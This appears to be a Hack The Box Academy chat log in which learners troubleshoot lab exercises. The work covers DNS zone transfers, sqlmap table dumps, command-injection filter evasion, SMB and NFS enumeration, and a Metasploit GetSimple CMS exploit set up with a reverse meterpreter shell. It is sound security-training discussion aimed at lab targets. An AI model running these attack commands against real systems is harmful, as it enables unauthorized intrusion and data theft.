when I run any DNS enum tools or commands on inlanefreight.htb I do not see a nameserver. if i use the ns1.inlanefreight.com one, I can actively subbrute, but not for inlanefreight.htb. there is no nameserver that I can find for inlanefreight.htb.

||└──╼ [★]$ cat resolvers.txt
ns1.inlanefreight.com
┌─[us-academy-1]─[10.10.15.203]─[htb-ac-30427@htb-mota8xpkb2]─[~/Desktop/subbrute]
└──╼ [★]$ ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
||

Use the target IP as DNS server

in the resolvers.txt?

yup

hey i'm trying to instal the odat.py using the provided script but I'm getting an externally managed environment error during the installation

Hello how to send my cookies windows on my machines linux

OK DNS is always the bane of my existence. I have tried dig commands for ANY, AXFR, TXT on all these subdomains. I have not seen any flags. Am I just being impatient since the subbrute isn't finished? or are there any other digs I can use. here is an example dig command, below that is my subbrute:

||dig axfr hr.inlanefreight.htb 10.129.125.41||

||./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.htb
hr.inlanefreight.htb
helpdesk.inlanefreight.htb
ns.inlanefreight.htb
control.inlanefreight.htb||

Hello I’m using HTB academy free subscription and I’m currently studying the Linux module and I can’t unlock any module even though I had enough cubes . Can anyone tell me why it occurs?

look up how to open a sqlite db, it's also in the module

Remember that not all zones allow a zone transfer.
Always use small lists for subbrute. Never use large lists. They may not contain what you are looking for

Can someone help me with these two questions am stuck

1. open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM.
2. SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes

hi guys can i have any advances course on hacking?

please help i am new.

Each module costs cubes
For Tier 0 modules you get 10 cubes back each time you complete them. You can then use this to buy another module for 10 cubes (Tier 0)

Yeah I have checked ANY and TXT for those as well. I am running a new one with names_small.txt

Ok bro but I have 63 cubes now but now also I can’t unlock a module which cost only 10 cubes

disable AdBlocker

Ok I’ll try this

try a different list

Thank you it works 👍

Hi all, currently in Windows Event Logs & Finding Evil Module for SOC analyst role.
I've modified and saved the file on host machine but I'm not sure how to transfer that into the RDP machine.

Do I need to config and save the xml file in the RDP machine instead?

sudo netstat -tunleep | grep -v "127.0.0" | wc -l
htb-student is not in the sudoers file. This incident will be reported
0

i have also tried to read in the module but cant find anything that might help

What exactly have you tried?

Which module and which section?

Nvm - I'm dumb. I found the file in the spawned VM lol

splunk introduction

I have tried
EventCode=4624 Account_Name=SYSTEM
| stats dc(Computer) as Distinct_Computers

subbrute only came with names.txt and names_small.txt

Look again in the module.
There are other options

can someone explain this special marker to me a bit more for sqlmap?

so basically if you just know the uid you can use this special marker to guess or run through other stuff?

of course the image wont load lol

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

the * part

that's just to tell sqlmap where to inject

can anyone help me with pivoting skill assessment , i got the credentials and private key , every time i ssh the server i got wrong password

where to inject what exactly? the vulnerability it finds?

inject the sql injection queries

ahh gotcha, thank you

it will parse and try to find the injection point on its own, but if you're sure where it is, specifying would make it a lot faster

i tried running without the special marker but it didnt work at all

Hey anyone

I got password attacks lab hard the back.vhd file onto pwn box now trying to Crack it

Getting error while extracting daya message

Im doing the filter contents module and i cant remember where they explained cURL in linux fundamentals. i googled and got a small understanding but what does each part of this command i found on the forums do?

Did you figure this out? Looks like you missed a key piece of information in the module.

Bitlocker2john

Ah I did it but it's shows

Error while extracting data no signature found

Then maybe the file got corrupted while transferring

I was does it take a lot of time to transfer

It shouldn't considering what's actually on it

Mm

I don't knw here it's taking some time

A couple minutes at most

Xfreerdp has the /drive: option to mount for easier transfer

I'm using that

Itself still

Taking 10 minutes plus

Sounds like your connection might be shaky

Do a checksum on it: md5sum in linux and Get-Filehash in powershell

Mm

why does sqlmap -u "http://94.237.58.224:34083/case5.php?id=1" --batch --dump --no-cast -T flag5 --level=5 --risk=3
this take soo long?? like 40 min sqlmap

SQLMap Essentials

Page 6
Attack Tuning

Attack Tuning

case 5

look at the level and risk you provided in your command.. that's going to take forever to finish

what is best then

3 and 3?

🤷‍♂️

the point of the exercise is for you to tune it yourself

why doesnt sqlmap case 5 flag work for me?

because it's not good. 🙂

its the flag?

Yeah. On my side it's slightly different.

Hey, I'm working on File Upload Attacks - Limited File Uploads so I managed to exploit the Xss but when I try to read any content like index.php , upload.php using the XXE payload it didn't work! I have tried to change the directory as mention on the Section but still no luck any hint?

I'd delete that, as it still can be an answer

Command Injections - Skills Assessment. I've teste && and ||, but they are considered malicious.

are they same flag u get?

Even if not: it's a flag format so be careful

I'm working on DIRECTORY ENUMERATION & ATTACKS module atm. I understand that I need to sniff the ens224 interface from on the Parrot OS but this interface doesn't exist. Do I miss something here ?

type 'ip a' and see what your adapter is called

ifconfig for Linux, and ipconfig for Windows. Check your network adapters names, because on the boxex they might have a different name.

Only eth0 and tun0

so which one do you think your vpn adapter is?

tun0

right

You are doing AD module?

yES

You do it from the target box, not the pwnbox instance

Connect to the target box and do it from there.

ensX is used on the target machines

Basically, your target machine it's like a proxy between you and AD environment. 🙂

So, do you have any idea why on the Command Injections - Skills Assessment all operators are considered malicious?

yes, you need to obfuscate the commands

even the operators? 😄

i mean &&, ||...

they may be, yes

i don't recall those ones specifically but i remember - being flagged

remember to enumerate what exactly is triggering the block

i tested them individually, without anything else

Is it on 172.16.5.0/23 ? There's nothing in that network

connect to the target box, use ifconfig and you will find the ens*

Is the target box is the box that provided running on Parrot OS ?

no

or maybe yes

what module are you doing?

Active Directory Enumeration & Attacks

yes, but there are multiple lessons

which one?

Initial Enumeration of the Domain

no

Spawn instance and spawn target are completely different

Spawn Instance spawns an instance of the Pwnbox attack box
Spawn target spawns a box (generally) on the 10.129.x.x network for you to attack (which may or may not be networked)

the only way to interact with targets is usually via either ssh or rdp with given creds

So the intruction clearly said snif eth0, ARP packets make us aware of the hosts: 172.16.5.5, 172.16.5.25 172.16.5.50, 172.16.5.100, and 172.16.5.125.

though sometimes it's via protocols like winRM/SMB/FTP

yes: sniff it on the target

if your system doesn't have the 172.16.5.x connection: then you won't see this traffic

I did but eth0 is external IP. No ARP here

listen to me carefully

VERY carefully

look JUST above the questions

do you see a 10.129.x.x IP OR Green text that says "Click Here To Spawn Target!"

this ^

in order to perform the excersize you must first connect to the target system

can someone help me im in paylaods and shells module one the live engagement and when i exploit i get an error saying : no method error undefined method "get_cookies"

i don't ever recall that error; but I do know for one of the exploits you do need to define the vHost

i have

im thinking its the rhost because i use kali and i just do tun0

oh

you need to use the provided jump host

and the Lhost will be different for the exploits as well

Thanks found it.

So confusing they add this instruction at the bottom of the page.

uh whts that

it's literally how all the modules work

the 10.129.x.x host spawned via the "Spawn Target" button

jump host simply refers to a median host that's used to connect to other devices on a network

oh im supposed to put in the lhost

or rhost

Does the device your using have the same interface as any of the 3 targets?

no, because they are on a separate network

:P

you need to first rdp to the 10.129.x.x target; then carry out the attacks on the hosts

yea im on the rdp

(firefox is installed on that target)

the lhost needs to be on the same network as the target(s)

[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.

restart msfconsole and reset the options

sometimes it's dumb.

spwaning problems known ?

worked

idk wht i changed lol thx

some weird artifact of whatever was loaded before

lol now it spawned

Hello everyone. Im doing the getting started modulo and I got to section Nibbles - Privilege Escalation to the part I have to download LinEnum.sh script but When I try to access the link into my pwnbox it doesnt display. Any ideas on how to download the script into my pwnbox?

git clone or wget

try and git clone the .sh file i cant remember the exact url from gh

You don't need it for nibbles

I tried git clone but it times out. Seems like my pwnboxdoesn'thave internet access

are you sure the tool isn't provided in any directory?

wait yeah linenum should come with regardless no?

find / -name linenum.sh

Ill give it a try. Thanks!!

if you want to use that you need to transfer the file yourself. But as others said its really not necessary here, try the basic approaches first.

Thank you all

└──╼ $sqlmap -u "http://94.237.58.155:55819/case6.php?col=id" --batch --prefix="')" --level=2 --risk=3 --dump
why this mofo taking so long

morning all, still very stuck on the medium challenge https://academy.hackthebox.com/module/112/section/1079 I don't really know where to begin. Looked at enum4linux. Checked metasploit. Im drawing blanks

I have gone back to the smb section of the learning path, because that's where I think I should be focusing, but would love some guidance

can anyone help me with the install of the odat.py file I'm getting an externally-managed-environment error

never mind apparently its the repository and you can just regulary install it

had trouble at it aswell. got it from github 💀

and worked fine

Thank you I would of been on the labs already but I was trying to see what was wrong with the script

I am so stuck

i think at some point it will give you sometzhing like:
crypto or something not found:
here is the solution
#858470491676737536 message

This medium level footprinting lab is so tough for me lol

where are you stuck?

lol, I don't really know where to begin. I have run nmap against the ip. I have tried enum4linux. I believe the vulnerability is withing smb or rdp but I am just having a world of trouble gettting anywhere

i ran nmap with the flag --vuln scripts. got a cve back but didn't get anywhere with it

had to pull out my writeup
No CVEs needed

^

yea smb and rdp are running and something else

there's no need for exploits

it's just basic enumeration tactics

i personally didnt go the smb route, i think Marcie went since i think i quicky searched for it after i was done with it

yea Basic enumeration that was written in the Modules

that's all that the footprinting module taught you, so that's all you should go with

I mean I went the manual route for finding the important document when i first went through it; then realized "Oh...smb is running"

still need to enumerate the creds from one of the running services

I have been trying to crack into smb but i can't figure how, I think that's where i went to enum4linux

oh so its only the "Important" docment on SMB which is used later on. yea i found that via Server Manager lol

enum4linux is not needed, the target is a Windows Machine anyway

I think the problem i hit was when i enumerated I couldn't find any shares to connect to

and in order to run enum4linux you'd need to be connected to the target

:P otherwise running it locally runs it on your own system

which is about as useful as a chocolate teapot

makes good hot chocolate

not the point

any hints on where I should go back to look at?

scan all the ports

what services have you found?

there's a service you're missing that's not SMB or RDP

except rdp and smb

msrpc?

msrcp thats 135 port?

also to enumerate SMB shares you can just do smbclient.py -L -N //ip/

rpc is still really only useful if you have creds

yes

as msrpc is usually tied with SMB

need creds for it

and we don't obviously initially have the creds, so it's something else hmm

nfs?

its worth checking it out

if you haven't checked it out; i'd highly recommend it

maybe something will come out of it! and if you are stuck there because of a permission, reread the module, somwhere its being explained

thanks guys, you are both really helpful in a not just giving the answer way. It's really appreciated

as i will constantly remind anyone that gets stuck like this:

step 0: enumerate

Always double check that you enumerated all the services you can

and all the ports. even udp ones....

(not connected to medium lab)

create a checklist of services that have the potential to be logged into anonymously
if they're exposed - are they anonymous login? no? check other ports

gonna need to go for a walk to get that one (if you're referencing another lab)

there is an nmap scan that comes back with anonymous login in allowed or not usually, I didn't see that this time so I must not have done it properyl

well sometimes the scripts are unreliable

don't rely on automation when the manual method can easily confirm or deny ¯_(ツ)_/¯

yea it took me a while cuz i totally forgot about them. then went for a walk whcih again i was blind and took me another 30 -1h lessons learned

i can't tell you how many people have completely missed their keys when going for a walk. I mean it was right there

and imo it can be easily guessed (but that's just from having already completed it)

this is a very hard skill to learn

i can also tell you that I was in the same boat on that lab, spent so long focusing on A... that I didn't realize that B was there until i re-read the engagement brief

this is why it's early in the path

to get you in the habit of doing it

never assume the question is the first step in the journey

a good example of the above point is the password attacks - mutated password section: you're told to get a user's creds and ssh in; but bruteforcing ssh is like pulling teeth

so you have to enumerate for other exposed services

DUDE THANK GOD IM NOT ALONE. i got the key and though of it just as a normal output thinking nothing out of it. throwing everything above and beyond enumerating other services. till i went and got again the walk hint from this where i told myself, i missed something 100%.....

the palm attaches to the face swiftly

I'm stuck on the advanced xss filter bypass section, I'm able to bypass the filter but I'm not seeing any interaction past that. I can reference the exploit server as the script source and it works fine, but the payload for capturing admin interaction isnt giving me anything

https://tenor.com/view/facepalm-kermit-gif-18546996

i just went and reread it..... i see what the server was used for LOL

i have managed to mount the nfs and read it. So far I have just found a bunch of empty ticket files

EXACTLY

if only there was a way to search for not-empty files

list them there must be a needle in a haystack

when you say list them, you mean to iterate through and cat their contents?

nope

nah there is a command

that shows how big files are

you can do just ls -la for the quick way

a very used one

yea this one

or you can just do a find command with some flags to specify the size

i think like +0 will show any above zero

i use -la everytwhere since it shows hidden / . files aswell

they catch ya out on one of the modules/sections with that iirc, the entire folder you connect to is all hidden files

and it's like "why is it empty... oh wait"

you mean on the footpriting module or other?

ooh Celia??

thanks, slowly progressing

that might be the one, (i think you misspelt the name)

fun fact: that skill assessment used to not have that user's creds given to you, you had to check the hints for it

yes, that's an interesting ticked for sure

or had to creatively bruteforce

yea just went into my writeups and Ceil had all . files

that part i dont like. the guessing, same thing happend with the footprinting wordlist. took me ages without any hit, searched for a hint on intertet and saw someone telling did you use the wordlist provided?? and i was like bruh what? they provide you a wordlist?

progress!

resources button goes brr

i try to avoid any hints/ resources there untill i feel like im really stuck

aren't most resources necessary to complete the module

well i didnt know untill that specific footprining exercise that resources exist

it do be like that sometimes

sorry guys I need help again, ive been able to connect with smb and found a file with what i think is an admin user, but I am struggling to jump in knowledge to where to use this

What section /modulr

https://academy.hackthebox.com/module/112/section/1079

i gained a username and pasword. logged in via smb. found a file with a username and creds, but don't know where to apply that

try logging in with that and see what you can access

that's my problem, not sure where to log in. tried logging into smb with those creds, failed

I feel like it's an admin password and user I found since the username was just two letters

check the hint, try it with sql

how do I try it with sql. I am not sure of thsi

other than smb, how else can you login to acces the sql stuido gui?

you should know the syntax since it was covered in SQL section

let me go back to the sql section and see then

thanks

I keep getting a connection refused error

if I remember right you'll need to rdp to target then login to sql with the creds

could be wrong tho, it's been a while

I made some progress today lol. This module is taking me an eternity

try to re rdp

looking now

with new creds

doesn't like the creds i found in the text file, or I am just hitting a wall

ok tell me

you have the ||sa|| creds?

Hi guys, need a little hint on the module of Getting Started after Nibbles box there's a Knowledge Check section I have submitted both user and root flags through manual method but I also wanted to do the msf one as well just to build the understanding but I'm getting error while exploiting. I am pretty sure that it has something to do with setting the "TargetURI". I have set it to /admin so that it can authenticate with valid creds as its an authenticated vuln however I have also tested /theme/Innovation/template.php as the vuln is related to php code injection. Still Getting the error of

[] Started reverse TCP handler on 10.10.14.88:7777
[] 10.129.237.195:80 - Authenticating...
[-] 10.129.237.195:80 - Exploit aborted due to failure: no-access: 10.129.237.195:80 - Authentication failed
[*] Exploit completed, but no session was created.

msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > show options

Module options (exploit/unix/webapp/get_simple_cms_upload_exec):

Name Current Setting Required Description

PASSWORD admin yes The right password for the provided username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.237.195 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /admin yes The full URI path to GetSimplecms
USERNAME admin yes The username that will be used for authentication process
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description

LHOST 10.10.14.88 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port

Exploit target:

Id Name

0 Generic (PHP Payload)

View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > exploit

^ THIS IS WHAT I HAVE DONE

10.129.237.195/admin

try that